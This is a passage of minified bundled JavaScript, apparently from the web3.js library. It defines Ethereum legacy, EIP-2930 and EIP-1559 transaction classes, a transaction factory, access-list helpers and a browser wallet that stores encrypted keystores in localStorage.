                        if (this.accessList = d.accessList, this.AccessListJSON = d.AccessListJSON, (0, c.verifyAccessList)(this.accessList), this.maxFeePerGas = (0, l.uint8ArrayToBigInt)((0, l.toUint8Array)("" === o ? "0x" : o)), this.maxPriorityFeePerGas = (0, l.uint8ArrayToBigInt)((0, l.toUint8Array)("" === s ? "0x" : s)), this._validateCannotExceedMaxInteger({
                            maxFeePerGas: this.maxFeePerGas,
                            maxPriorityFeePerGas: this.maxPriorityFeePerGas
                        }), u.BaseTransaction._validateNotArray(e), this.gasLimit * this.maxFeePerGas > a.MAX_INTEGER) {
                            const e = this._errorMsg("gasLimit * maxFeePerGas cannot exceed MAX_INTEGER (2^256-1)");
                            throw new Error(e);
                        }
                        if (this.maxFeePerGas < this.maxPriorityFeePerGas) {
                            const e = this._errorMsg("maxFeePerGas cannot be less than maxPriorityFeePerGas (The total must be the larger of the two)");
                            throw new Error(e);
                        }
                        this._validateYParity(), this._validateHighS(), (null === (r = null == t ? void 0 : t.freeze) || void 0 === r || r) && Object.freeze(this);
                    }
                    static fromTxData(e, t = {}) {
                        return new h(e, t);
                    }
                    static fromSerializedTx(e, t = {}) {
                        if (!(0, s.uint8ArrayEquals)(e.subarray(0, 1), d)) throw new Error(`Invalid serialized tx input: not an EIP-1559 transaction (wrong tx type, expected: 2, received: ${(0, s.bytesToHex)(e.subarray(0, 1))}`);
                        const r = o.RLP.decode(e.subarray(1));
                        if (!Array.isArray(r)) throw new Error("Invalid serialized tx input: must be array");
                        return h.fromValuesArray(r, t);
                    }
                    static fromValuesArray(e, t = {}) {
                        if (9 !== e.length && 12 !== e.length) throw new Error("Invalid EIP-1559 transaction. Only expecting 9 values (for unsigned tx) or 12 values (for signed tx).");
                        const [r, n, o, s, a, u, c, d, f, p, m, g] = e;
                        return this._validateNotArray({
                            chainId: r,
                            v: p
                        }), (0, i.validateNoLeadingZeroes)({
                            nonce: n,
                            maxPriorityFeePerGas: o,
                            maxFeePerGas: s,
                            gasLimit: a,
                            value: c,
                            v: p,
                            r: m,
                            s: g
                        }), new h({
                            chainId: (0, l.uint8ArrayToBigInt)(r),
                            nonce: n,
                            maxPriorityFeePerGas: o,
                            maxFeePerGas: s,
                            gasLimit: a,
                            to: u,
                            value: c,
                            data: d,
                            accessList: null != f ? f : [],
                            v: void 0 !== p ? (0, l.uint8ArrayToBigInt)(p) : void 0,
                            r: m,
                            s: g
                        }, t);
                    }
                    getDataFee() {
                        if (this.cache.dataFee && this.cache.dataFee.hardfork === this.common.hardfork()) return this.cache.dataFee.value;
                        let e = super.getDataFee();
                        return e += BigInt((0, c.getDataFeeEIP2930)(this.accessList, this.common)), Object.isFrozen(this) && (this.cache.dataFee = {
                            value: e,
                            hardfork: this.common.hardfork()
                        }), e;
                    }
                    getUpfrontCost(e = BigInt(0)) {
                        const t = this.maxPriorityFeePerGas, r = this.maxFeePerGas - e, n = (t < r ? t : r) + e;
                        return this.gasLimit * n + this.value;
                    }
                    raw() {
                        return [
                            (0, l.bigIntToUnpaddedUint8Array)(this.chainId),
                            (0, l.bigIntToUnpaddedUint8Array)(this.nonce),
                            (0, l.bigIntToUnpaddedUint8Array)(this.maxPriorityFeePerGas),
                            (0, l.bigIntToUnpaddedUint8Array)(this.maxFeePerGas),
                            (0, l.bigIntToUnpaddedUint8Array)(this.gasLimit),
                            void 0 !== this.to ? this.to.buf : Uint8Array.from([]),
                            (0, l.bigIntToUnpaddedUint8Array)(this.value),
                            this.data,
                            this.accessList,
                            void 0 !== this.v ? (0, l.bigIntToUnpaddedUint8Array)(this.v) : Uint8Array.from([]),
                            void 0 !== this.r ? (0, l.bigIntToUnpaddedUint8Array)(this.r) : Uint8Array.from([]),
                            void 0 !== this.s ? (0, l.bigIntToUnpaddedUint8Array)(this.s) : Uint8Array.from([])
                        ];
                    }
                    serialize() {
                        const e = this.raw();
                        return (0, s.uint8ArrayConcat)(d, o.RLP.encode(e));
                    }
                    getMessageToSign(e = !0) {
                        const t = this.raw().slice(0, 9), r = (0, s.uint8ArrayConcat)(d, o.RLP.encode(t));
                        return e ? (0, n.keccak256)(r) : r;
                    }
                    hash() {
                        if (!this.isSigned()) {
                            const e = this._errorMsg("Cannot call hash method if transaction is not signed");
                            throw new Error(e);
                        }
                        return Object.isFrozen(this) ? (this.cache.hash || (this.cache.hash = (0, n.keccak256)(this.serialize())), this.cache.hash) : (0, n.keccak256)(this.serialize());
                    }
                    getMessageToVerifySignature() {
                        return this.getMessageToSign();
                    }
                    getSenderPublicKey() {
                        if (!this.isSigned()) {
                            const e = this._errorMsg("Cannot call this method if transaction is not signed");
                            throw new Error(e);
                        }
                        const e = this.getMessageToVerifySignature(), { v: t, r: r, s: n } = this;
                        this._validateHighS();
                        try {
                            return (0, l.ecrecover)(e, t + BigInt(27), (0, l.bigIntToUnpaddedUint8Array)(r), (0, l.bigIntToUnpaddedUint8Array)(n));
                        } catch (e) {
                            const t = this._errorMsg("Invalid Signature");
                            throw new Error(t);
                        }
                    }
                    _processSignature(e, t, r) {
                        const n = Object.assign(Object.assign({}, this.txOptions), {
                            common: this.common
                        });
                        return h.fromTxData({
                            chainId: this.chainId,
                            nonce: this.nonce,
                            maxPriorityFeePerGas: this.maxPriorityFeePerGas,
                            maxFeePerGas: this.maxFeePerGas,
                            gasLimit: this.gasLimit,
                            to: this.to,
                            value: this.value,
                            data: this.data,
                            accessList: this.accessList,
                            v: e - BigInt(27),
                            r: (0, l.uint8ArrayToBigInt)(t),
                            s: (0, l.uint8ArrayToBigInt)(r)
                        }, n);
                    }
                    toJSON() {
                        const e = (0, c.getAccessListJSON)(this.accessList);
                        return {
                            chainId: (0, l.bigIntToHex)(this.chainId),
                            nonce: (0, l.bigIntToHex)(this.nonce),
                            maxPriorityFeePerGas: (0, l.bigIntToHex)(this.maxPriorityFeePerGas),
                            maxFeePerGas: (0, l.bigIntToHex)(this.maxFeePerGas),
                            gasLimit: (0, l.bigIntToHex)(this.gasLimit),
                            to: void 0 !== this.to ? this.to.toString() : void 0,
                            value: (0, l.bigIntToHex)(this.value),
                            data: (0, s.bytesToHex)(this.data),
                            accessList: e,
                            v: void 0 !== this.v ? (0, l.bigIntToHex)(this.v) : void 0,
                            r: void 0 !== this.r ? (0, l.bigIntToHex)(this.r) : void 0,
                            s: void 0 !== this.s ? (0, l.bigIntToHex)(this.s) : void 0
                        };
                    }
                    errorStr() {
                        let e = this._getSharedErrorPostfix();
                        return e += ` maxFeePerGas=${this.maxFeePerGas} maxPriorityFeePerGas=${this.maxPriorityFeePerGas}`, e;
                    }
                    _errorMsg(e) {
                        return `${e} (${this.errorStr()})`;
                    }
                }
                t.FeeMarketEIP1559Transaction = h;
            },
            9013: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.AccessListEIP2930Transaction = void 0;
                const n = r(7423), i = r(7345), o = r(7256), s = r(9634), a = r(4555), u = r(4562), c = r(2290), l = r(915), d = (0, s.hexToBytes)(1..toString(16).padStart(2, "0"));
                class h extends l.BaseTransaction {
                    constructor(e, t = {}){
                        var r;
                        super(Object.assign(Object.assign({}, e), {
                            type: 1
                        }), t), this.DEFAULT_HARDFORK = "berlin";
                        const { chainId: n, accessList: i, gasPrice: o } = e;
                        if (this.common = this._getCommon(t.common, n), this.chainId = this.common.chainId(), !this.common.isActivatedEIP(2930)) throw new Error("EIP-2930 not enabled on Common");
                        this.activeCapabilities = this.activeCapabilities.concat([
                            2718,
                            2930
                        ]);
                        const s = (0, u.getAccessListData)(null != i ? i : []);
                        if (this.accessList = s.accessList, this.AccessListJSON = s.AccessListJSON, (0, u.verifyAccessList)(this.accessList), this.gasPrice = (0, c.uint8ArrayToBigInt)((0, c.toUint8Array)("" === o ? "0x" : o)), this._validateCannotExceedMaxInteger({
                            gasPrice: this.gasPrice
                        }), l.BaseTransaction._validateNotArray(e), this.gasPrice * this.gasLimit > a.MAX_INTEGER) {
                            const e = this._errorMsg("gasLimit * gasPrice cannot exceed MAX_INTEGER");
                            throw new Error(e);
                        }
                        this._validateYParity(), this._validateHighS(), (null === (r = null == t ? void 0 : t.freeze) || void 0 === r || r) && Object.freeze(this);
                    }
                    static fromTxData(e, t = {}) {
                        return new h(e, t);
                    }
                    static fromSerializedTx(e, t = {}) {
                        if (!(0, s.uint8ArrayEquals)(e.subarray(0, 1), d)) throw new Error(`Invalid serialized tx input: not an EIP-2930 transaction (wrong tx type, expected: 1, received: ${(0, s.bytesToHex)(e.subarray(0, 1))}`);
                        const r = o.RLP.decode(Uint8Array.from(e.subarray(1)));
                        if (!Array.isArray(r)) throw new Error("Invalid serialized tx input: must be array");
                        return h.fromValuesArray(r, t);
                    }
                    static fromValuesArray(e, t = {}) {
                        if (8 !== e.length && 11 !== e.length) throw new Error("Invalid EIP-2930 transaction. Only expecting 8 values (for unsigned tx) or 11 values (for signed tx).");
                        const [r, n, o, s, a, u, l, d, f, p, m] = e;
                        return this._validateNotArray({
                            chainId: r,
                            v: f
                        }), (0, i.validateNoLeadingZeroes)({
                            nonce: n,
                            gasPrice: o,
                            gasLimit: s,
                            value: u,
                            v: f,
                            r: p,
                            s: m
                        }), new h({
                            chainId: (0, c.uint8ArrayToBigInt)(r),
                            nonce: n,
                            gasPrice: o,
                            gasLimit: s,
                            to: a,
                            value: u,
                            data: l,
                            accessList: null != d ? d : [],
                            v: void 0 !== f ? (0, c.uint8ArrayToBigInt)(f) : void 0,
                            r: p,
                            s: m
                        }, t);
                    }
                    getDataFee() {
                        if (this.cache.dataFee && this.cache.dataFee.hardfork === this.common.hardfork()) return this.cache.dataFee.value;
                        let e = super.getDataFee();
                        return e += BigInt((0, u.getDataFeeEIP2930)(this.accessList, this.common)), Object.isFrozen(this) && (this.cache.dataFee = {
                            value: e,
                            hardfork: this.common.hardfork()
                        }), e;
                    }
                    getUpfrontCost() {
                        return this.gasLimit * this.gasPrice + this.value;
                    }
                    raw() {
                        return [
                            (0, c.bigIntToUnpaddedUint8Array)(this.chainId),
                            (0, c.bigIntToUnpaddedUint8Array)(this.nonce),
                            (0, c.bigIntToUnpaddedUint8Array)(this.gasPrice),
                            (0, c.bigIntToUnpaddedUint8Array)(this.gasLimit),
                            void 0 !== this.to ? this.to.buf : Uint8Array.from([]),
                            (0, c.bigIntToUnpaddedUint8Array)(this.value),
                            this.data,
                            this.accessList,
                            void 0 !== this.v ? (0, c.bigIntToUnpaddedUint8Array)(this.v) : Uint8Array.from([]),
                            void 0 !== this.r ? (0, c.bigIntToUnpaddedUint8Array)(this.r) : Uint8Array.from([]),
                            void 0 !== this.s ? (0, c.bigIntToUnpaddedUint8Array)(this.s) : Uint8Array.from([])
                        ];
                    }
                    serialize() {
                        const e = this.raw();
                        return (0, s.uint8ArrayConcat)(d, o.RLP.encode(e));
                    }
                    getMessageToSign(e = !0) {
                        const t = this.raw().slice(0, 8), r = (0, s.uint8ArrayConcat)(d, o.RLP.encode(t));
                        return e ? (0, n.keccak256)(r) : r;
                    }
                    hash() {
                        if (!this.isSigned()) {
                            const e = this._errorMsg("Cannot call hash method if transaction is not signed");
                            throw new Error(e);
                        }
                        return Object.isFrozen(this) ? (this.cache.hash || (this.cache.hash = (0, n.keccak256)(this.serialize())), this.cache.hash) : (0, n.keccak256)(this.serialize());
                    }
                    getMessageToVerifySignature() {
                        return this.getMessageToSign();
                    }
                    getSenderPublicKey() {
                        if (!this.isSigned()) {
                            const e = this._errorMsg("Cannot call this method if transaction is not signed");
                            throw new Error(e);
                        }
                        const e = this.getMessageToVerifySignature(), { v: t, r: r, s: n } = this;
                        this._validateHighS();
                        try {
                            return (0, c.ecrecover)(e, t + BigInt(27), (0, c.bigIntToUnpaddedUint8Array)(r), (0, c.bigIntToUnpaddedUint8Array)(n));
                        } catch (e) {
                            const t = this._errorMsg("Invalid Signature");
                            throw new Error(t);
                        }
                    }
                    _processSignature(e, t, r) {
                        const n = Object.assign(Object.assign({}, this.txOptions), {
                            common: this.common
                        });
                        return h.fromTxData({
                            chainId: this.chainId,
                            nonce: this.nonce,
                            gasPrice: this.gasPrice,
                            gasLimit: this.gasLimit,
                            to: this.to,
                            value: this.value,
                            data: this.data,
                            accessList: this.accessList,
                            v: e - BigInt(27),
                            r: (0, c.uint8ArrayToBigInt)(t),
                            s: (0, c.uint8ArrayToBigInt)(r)
                        }, n);
                    }
                    toJSON() {
                        const e = (0, u.getAccessListJSON)(this.accessList);
                        return {
                            chainId: (0, c.bigIntToHex)(this.chainId),
                            nonce: (0, c.bigIntToHex)(this.nonce),
                            gasPrice: (0, c.bigIntToHex)(this.gasPrice),
                            gasLimit: (0, c.bigIntToHex)(this.gasLimit),
                            to: void 0 !== this.to ? this.to.toString() : void 0,
                            value: (0, c.bigIntToHex)(this.value),
                            data: (0, s.bytesToHex)(this.data),
                            accessList: e,
                            v: void 0 !== this.v ? (0, c.bigIntToHex)(this.v) : void 0,
                            r: void 0 !== this.r ? (0, c.bigIntToHex)(this.r) : void 0,
                            s: void 0 !== this.s ? (0, c.bigIntToHex)(this.s) : void 0
                        };
                    }
                    errorStr() {
                        var e, t;
                        let r = this._getSharedErrorPostfix();
                        return r += ` gasPrice=${this.gasPrice} accessListCount=${null !== (t = null === (e = this.accessList) || void 0 === e ? void 0 : e.length) && void 0 !== t ? t : 0}`, r;
                    }
                    _errorMsg(e) {
                        return `${e} (${this.errorStr()})`;
                    }
                }
                t.AccessListEIP2930Transaction = h;
            },
            9275: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.TransactionFactory = t.Transaction = t.AccessListEIP2930Transaction = t.FeeMarketEIP1559Transaction = void 0;
                var o = r(6135);
                Object.defineProperty(t, "FeeMarketEIP1559Transaction", {
                    enumerable: !0,
                    get: function() {
                        return o.FeeMarketEIP1559Transaction;
                    }
                });
                var s = r(9013);
                Object.defineProperty(t, "AccessListEIP2930Transaction", {
                    enumerable: !0,
                    get: function() {
                        return s.AccessListEIP2930Transaction;
                    }
                });
                var a = r(5381);
                Object.defineProperty(t, "Transaction", {
                    enumerable: !0,
                    get: function() {
                        return a.Transaction;
                    }
                });
                var u = r(7668);
                Object.defineProperty(t, "TransactionFactory", {
                    enumerable: !0,
                    get: function() {
                        return u.TransactionFactory;
                    }
                }), i(r(9964), t);
            },
            5381: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Transaction = void 0;
                const n = r(7256), i = r(7423), o = r(9634), s = r(7345), a = r(2290), u = r(4555), c = r(915), l = r(9964);
                function d(e, t) {
                    const r = Number(e), n = 2 * Number(t);
                    return r === n + 35 || r === n + 36;
                }
                class h extends c.BaseTransaction {
                    constructor(e, t = {}){
                        var r;
                        if (super(Object.assign(Object.assign({}, e), {
                            type: 0
                        }), t), this.common = this._validateTxV(this.v, t.common), this.gasPrice = (0, a.uint8ArrayToBigInt)((0, a.toUint8Array)("" === e.gasPrice ? "0x" : e.gasPrice)), this.gasPrice * this.gasLimit > u.MAX_INTEGER) {
                            const e = this._errorMsg("gas limit * gasPrice cannot exceed MAX_INTEGER (2^256-1)");
                            throw new Error(e);
                        }
                        this._validateCannotExceedMaxInteger({
                            gasPrice: this.gasPrice
                        }), c.BaseTransaction._validateNotArray(e), this.common.gteHardfork("spuriousDragon") && (this.isSigned() ? d(this.v, this.common.chainId()) && this.activeCapabilities.push(l.Capability.EIP155ReplayProtection) : this.activeCapabilities.push(l.Capability.EIP155ReplayProtection)), (null === (r = null == t ? void 0 : t.freeze) || void 0 === r || r) && Object.freeze(this);
                    }
                    static fromTxData(e, t = {}) {
                        return new h(e, t);
                    }
                    static fromSerializedTx(e, t = {}) {
                        const r = n.RLP.decode(e);
                        if (!Array.isArray(r)) throw new Error("Invalid serialized tx input. Must be array");
                        return this.fromValuesArray(r, t);
                    }
                    static fromValuesArray(e, t = {}) {
                        if (6 !== e.length && 9 !== e.length) throw new Error("Invalid transaction. Only expecting 6 values (for unsigned tx) or 9 values (for signed tx).");
                        const [r, n, i, o, a, u, c, l, d] = e;
                        return (0, s.validateNoLeadingZeroes)({
                            nonce: r,
                            gasPrice: n,
                            gasLimit: i,
                            value: a,
                            v: c,
                            r: l,
                            s: d
                        }), new h({
                            nonce: r,
                            gasPrice: n,
                            gasLimit: i,
                            to: o,
                            value: a,
                            data: u,
                            v: c,
                            r: l,
                            s: d
                        }, t);
                    }
                    raw() {
                        return [
                            (0, a.bigIntToUnpaddedUint8Array)(this.nonce),
                            (0, a.bigIntToUnpaddedUint8Array)(this.gasPrice),
                            (0, a.bigIntToUnpaddedUint8Array)(this.gasLimit),
                            void 0 !== this.to ? this.to.buf : Uint8Array.from([]),
                            (0, a.bigIntToUnpaddedUint8Array)(this.value),
                            this.data,
                            void 0 !== this.v ? (0, a.bigIntToUnpaddedUint8Array)(this.v) : Uint8Array.from([]),
                            void 0 !== this.r ? (0, a.bigIntToUnpaddedUint8Array)(this.r) : Uint8Array.from([]),
                            void 0 !== this.s ? (0, a.bigIntToUnpaddedUint8Array)(this.s) : Uint8Array.from([])
                        ];
                    }
                    serialize() {
                        return n.RLP.encode(this.raw());
                    }
                    _getMessageToSign() {
                        const e = [
                            (0, a.bigIntToUnpaddedUint8Array)(this.nonce),
                            (0, a.bigIntToUnpaddedUint8Array)(this.gasPrice),
                            (0, a.bigIntToUnpaddedUint8Array)(this.gasLimit),
                            void 0 !== this.to ? this.to.buf : Uint8Array.from([]),
                            (0, a.bigIntToUnpaddedUint8Array)(this.value),
                            this.data
                        ];
                        return this.supports(l.Capability.EIP155ReplayProtection) && (e.push((0, a.toUint8Array)(this.common.chainId())), e.push((0, a.unpadUint8Array)((0, a.toUint8Array)(0))), e.push((0, a.unpadUint8Array)((0, a.toUint8Array)(0)))), e;
                    }
                    getMessageToSign(e = !0) {
                        const t = this._getMessageToSign();
                        return e ? (0, i.keccak256)(n.RLP.encode(t)) : t;
                    }
                    getDataFee() {
                        return this.cache.dataFee && this.cache.dataFee.hardfork === this.common.hardfork() ? this.cache.dataFee.value : (Object.isFrozen(this) && (this.cache.dataFee = {
                            value: super.getDataFee(),
                            hardfork: this.common.hardfork()
                        }), super.getDataFee());
                    }
                    getUpfrontCost() {
                        return this.gasLimit * this.gasPrice + this.value;
                    }
                    hash() {
                        if (!this.isSigned()) {
                            const e = this._errorMsg("Cannot call hash method if transaction is not signed");
                            throw new Error(e);
                        }
                        return Object.isFrozen(this) ? (this.cache.hash || (this.cache.hash = (0, i.keccak256)(n.RLP.encode(this.raw()))), this.cache.hash) : (0, i.keccak256)(n.RLP.encode(this.raw()));
                    }
                    getMessageToVerifySignature() {
                        if (!this.isSigned()) {
                            const e = this._errorMsg("This transaction is not signed");
                            throw new Error(e);
                        }
                        const e = this._getMessageToSign();
                        return (0, i.keccak256)(n.RLP.encode(e));
                    }
                    getSenderPublicKey() {
                        const e = this.getMessageToVerifySignature(), { v: t, r: r, s: n } = this;
                        this._validateHighS();
                        try {
                            return (0, a.ecrecover)(e, t, (0, a.bigIntToUnpaddedUint8Array)(r), (0, a.bigIntToUnpaddedUint8Array)(n), this.supports(l.Capability.EIP155ReplayProtection) ? this.common.chainId() : void 0);
                        } catch (e) {
                            const t = this._errorMsg("Invalid Signature");
                            throw new Error(t);
                        }
                    }
                    _processSignature(e, t, r) {
                        let n = e;
                        this.supports(l.Capability.EIP155ReplayProtection) && (n += this.common.chainId() * BigInt(2) + BigInt(8));
                        const i = Object.assign(Object.assign({}, this.txOptions), {
                            common: this.common
                        });
                        return h.fromTxData({
                            nonce: this.nonce,
                            gasPrice: this.gasPrice,
                            gasLimit: this.gasLimit,
                            to: this.to,
                            value: this.value,
                            data: this.data,
                            v: n,
                            r: (0, a.uint8ArrayToBigInt)(t),
                            s: (0, a.uint8ArrayToBigInt)(r)
                        }, i);
                    }
                    toJSON() {
                        return {
                            nonce: (0, a.bigIntToHex)(this.nonce),
                            gasPrice: (0, a.bigIntToHex)(this.gasPrice),
                            gasLimit: (0, a.bigIntToHex)(this.gasLimit),
                            to: void 0 !== this.to ? this.to.toString() : void 0,
                            value: (0, a.bigIntToHex)(this.value),
                            data: (0, o.bytesToHex)(this.data),
                            v: void 0 !== this.v ? (0, a.bigIntToHex)(this.v) : void 0,
                            r: void 0 !== this.r ? (0, a.bigIntToHex)(this.r) : void 0,
                            s: void 0 !== this.s ? (0, a.bigIntToHex)(this.s) : void 0
                        };
                    }
                    _validateTxV(e, t) {
                        let r;
                        const n = void 0 !== e ? Number(e) : void 0;
                        if (void 0 !== n && n < 37 && 27 !== n && 28 !== n) throw new Error(`Legacy txs need either v = 27/28 or v >= 37 (EIP-155 replay protection), got v = ${n}`);
                        if (void 0 !== n && 0 !== n && (!t || t.gteHardfork("spuriousDragon")) && 27 !== n && 28 !== n) {
                            if (t) {
                                if (!d(BigInt(n), t.chainId())) throw new Error(`Incompatible EIP155-based V ${n} and chain id ${t.chainId()}. See the Common parameter of the Transaction constructor to set the chain id.`);
                            } else {
                                let e;
                                e = (n - 35) % 2 == 0 ? 35 : 36, r = BigInt(n - e) / BigInt(2);
                            }
                        }
                        return this._getCommon(t, r);
                    }
                    errorStr() {
                        let e = this._getSharedErrorPostfix();
                        return e += ` gasPrice=${this.gasPrice}`, e;
                    }
                    _errorMsg(e) {
                        return `${e} (${this.errorStr()})`;
                    }
                }
                t.Transaction = h;
            },
            7668: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.TransactionFactory = void 0;
                const n = r(2290), i = r(6135), o = r(9013), s = r(5381);
                t.TransactionFactory = class {
                    constructor(){}
                    static fromTxData(e, t = {}) {
                        if (!("type" in e) || void 0 === e.type) return s.Transaction.fromTxData(e, t);
                        const r = Number((0, n.uint8ArrayToBigInt)((0, n.toUint8Array)(e.type)));
                        if (0 === r) return s.Transaction.fromTxData(e, t);
                        if (1 === r) return o.AccessListEIP2930Transaction.fromTxData(e, t);
                        if (2 === r) return i.FeeMarketEIP1559Transaction.fromTxData(e, t);
                        throw new Error(`Tx instantiation with type ${r} not supported`);
                    }
                    static fromSerializedData(e, t = {}) {
                        if (!(e[0] <= 127)) return s.Transaction.fromSerializedTx(e, t);
                        switch(e[0]){
                            case 1:
                                return o.AccessListEIP2930Transaction.fromSerializedTx(e, t);
                            case 2:
                                return i.FeeMarketEIP1559Transaction.fromSerializedTx(e, t);
                            default:
                                throw new Error(`TypedTransaction with ID ${e[0]} unknown`);
                        }
                    }
                    static fromBlockBodyData(e, t = {}) {
                        if (e instanceof Uint8Array) return this.fromSerializedData(e, t);
                        if (Array.isArray(e)) return s.Transaction.fromValuesArray(e, t);
                        throw new Error("Cannot decode transaction: unknown type input");
                    }
                };
            },
            9964: (e, t)=>{
                "use strict";
                function r(e) {
                    if (0 === e.length) return !0;
                    const t = e[0];
                    return !!Array.isArray(t);
                }
                var n;
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isAccessList = t.isAccessListUint8Array = t.Capability = void 0, (n = t.Capability || (t.Capability = {}))[n.EIP155ReplayProtection = 155] = "EIP155ReplayProtection", n[n.EIP1559FeeMarket = 1559] = "EIP1559FeeMarket", n[n.EIP2718TypedTransaction = 2718] = "EIP2718TypedTransaction", n[n.EIP2930AccessLists = 2930] = "EIP2930AccessLists", t.isAccessListUint8Array = r, t.isAccessList = function(e) {
                    return !r(e);
                };
            },
            4562: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getDataFeeEIP2930 = t.getAccessListJSON = t.verifyAccessList = t.getAccessListData = t.checkMaxInitCodeSize = void 0;
                const n = r(9634), i = r(2290), o = r(9964);
                t.checkMaxInitCodeSize = (e, t)=>{
                    const r = e.param("vm", "maxInitCodeSize");
                    if (r && BigInt(t) > r) throw new Error(`the initcode size of this transaction is too large: it is ${t} while the max is ${e.param("vm", "maxInitCodeSize")}`);
                }, t.getAccessListData = (e)=>{
                    let t, r;
                    if ((0, o.isAccessList)(e)) {
                        t = e;
                        const n = [];
                        for(let t = 0; t < e.length; t += 1){
                            const r = e[t], o = (0, i.toUint8Array)(r.address), s = [];
                            for(let e = 0; e < r.storageKeys.length; e += 1)s.push((0, i.toUint8Array)(r.storageKeys[e]));
                            n.push([
                                o,
                                s
                            ]);
                        }
                        r = n;
                    } else {
                        r = null != e ? e : [];
                        const i = [];
                        for(let e = 0; e < r.length; e += 1){
                            const t = r[e], o = (0, n.bytesToHex)(t[0]), s = [];
                            for(let e = 0; e < t[1].length; e += 1)s.push((0, n.bytesToHex)(t[1][e]));
                            const a = {
                                address: o,
                                storageKeys: s
                            };
                            i.push(a);
                        }
                        t = i;
                    }
                    return {
                        AccessListJSON: t,
                        accessList: r
                    };
                }, t.verifyAccessList = (e)=>{
                    for(let t = 0; t < e.length; t += 1){
                        const r = e[t], n = r[0], i = r[1];
                        if (void 0 !== r[2]) throw new Error("Access list item cannot have 3 elements. It can only have an address, and an array of storage slots.");
                        if (20 !== n.length) throw new Error("Invalid EIP-2930 transaction: address length should be 20 bytes");
                        for(let e = 0; e < i.length; e += 1)if (32 !== i[e].length) throw new Error("Invalid EIP-2930 transaction: storage slot length should be 32 bytes");
                    }
                }, t.getAccessListJSON = (e)=>{
                    const t = [];
                    for(let r = 0; r < e.length; r += 1){
                        const o = e[r], s = {
                            address: (0, n.bytesToHex)((0, i.setLengthLeft)(o[0], 20)),
                            storageKeys: []
                        }, a = o && o[1];
                        for(let e = 0; e < a.length; e += 1){
                            const t = a[e];
                            s.storageKeys.push((0, n.bytesToHex)((0, i.setLengthLeft)(t, 32)));
                        }
                        t.push(s);
                    }
                    return t;
                }, t.getDataFeeEIP2930 = (e, t)=>{
                    const r = t.param("gasPrices", "accessListStorageKeyCost"), n = t.param("gasPrices", "accessListAddressCost");
                    let i = 0;
                    for(let t = 0; t < e.length; t += 1)i += e[t][1].length;
                    return e.length * Number(n) + i * Number(r);
                };
            },
            4874: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            8632: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Wallet = void 0;
                const i = r(9970), o = r(7345);
                class s extends i.Web3BaseWallet {
                    constructor(){
                        super(...arguments), this._addressMap = new Map, this._defaultKeyName = "web3js_wallet";
                    }
                    static getStorage() {
                        let e;
                        try {
                            e = window.localStorage;
                            const t = "__storage_test__";
                            return e.setItem(t, t), e.removeItem(t), e;
                        } catch (t) {
                            return !t || 22 !== t.code && 1014 !== t.code && "QuotaExceededError" !== t.name && "NS_ERROR_DOM_QUOTA_REACHED" !== t.name || (0, o.isNullish)(e) || 0 === e.length ? void 0 : e;
                        }
                    }
                    create(e) {
                        for(let t = 0; t < e; t += 1)this.add(this._accountProvider.create());
                        return this;
                    }
                    add(e) {
                        var t;
                        if ("string" == typeof e) return this.add(this._accountProvider.privateKeyToAccount(e));
                        let r = this.length;
                        return this.get(e.address) && (console.warn(`Account ${e.address.toLowerCase()} already exists.`), r = null !== (t = this._addressMap.get(e.address.toLowerCase())) && void 0 !== t ? t : r), this._addressMap.set(e.address.toLowerCase(), r), this[r] = e, this;
                    }
                    get(e) {
                        if ("string" == typeof e) {
                            const t = this._addressMap.get(e.toLowerCase());
                            return (0, o.isNullish)(t) ? void 0 : this[t];
                        }
                        return this[e];
                    }
                    remove(e) {
                        if ("string" == typeof e) {
                            const t = this._addressMap.get(e.toLowerCase());
                            return !(0, o.isNullish)(t) && (this._addressMap.delete(e.toLowerCase()), this.splice(t, 1), !0);
                        }
                        return !!this[e] && (this.splice(e, 1), !0);
                    }
                    clear() {
                        return this._addressMap.clear(), this.length = 0, this;
                    }
                    encrypt(e, t) {
                        return n(this, void 0, void 0, function*() {
                            return Promise.all(this.map((r)=>n(this, void 0, void 0, function*() {
                                    return r.encrypt(e, t);
                                })));
                        });
                    }
                    decrypt(e, t, r) {
                        return n(this, void 0, void 0, function*() {
                            const i = yield Promise.all(e.map((e)=>n(this, void 0, void 0, function*() {
                                    return this._accountProvider.decrypt(e, t, r);
                                })));
                            for (const e of i)this.add(e);
                            return this;
                        });
                    }
                    save(e, t) {
                        return n(this, void 0, void 0, function*() {
                            const r = s.getStorage();
                            if (!r) throw new Error("Local storage not available.");
                            return r.setItem(null != t ? t : this._defaultKeyName, JSON.stringify((yield this.encrypt(e)))), !0;
                        });
                    }
                    load(e, t) {
                        return n(this, void 0, void 0, function*() {
                            const r = s.getStorage();
                            if (!r) throw new Error("Local storage not available.");
                            const n = r.getItem(null != t ? t : this._defaultKeyName);
                            return n && (yield this.decrypt(JSON.parse(n) || [], e)), this;
                        });
                    }
                }
                t.Wallet = s;
            },
